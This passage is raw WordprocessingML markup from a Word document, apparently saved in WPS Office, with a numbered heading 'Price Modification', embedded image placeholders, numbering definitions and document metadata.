          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F5D4F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>)Price Modification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2378075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="14605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5420" cy="1525905"/>
            <wp:effectExtent l="0" t="0" r="7620" b="13335"/>
            <wp:docPr id="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AD22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1610" cy="2058670"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13970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BA2AD0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="83BA2AD0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70608AE1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="70608AE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80744B"/>
    <w:rsid w:val="08B910B3"/>
    <w:rsid w:val="0E636FBC"/>
    <w:rsid w:val="13E13D9F"/>
    <w:rsid w:val="18794487"/>
    <w:rsid w:val="2580744B"/>
    <w:rsid w:val="2C083435"/>
    <w:rsid w:val="47422B69"/>
    <w:rsid w:val="48B14EF4"/>
    <w:rsid w:val="4FC074C1"/>
    <w:rsid w:val="5CD6563B"/>
    <w:rsid w:val="6CF501DC"/>
    <w:rsid w:val="707D6622"/>
    <w:rsid w:val="72596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143</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_12.2.0.20348_F1E327BC-269C-435d-A152-05C5408002CA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2025-03-31T07:18:00Z</dcterms:created>
  <dc:creator>jayad</dc:creator>
  <cp:lastModifiedBy>Jay Sid</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-07T05:35:31Z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2057-12.2.0.20348</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>A46AF3D20F584DAEABED593FB458A8A3_11</vt:lpwstr>
  </property>
</Properties>
</file>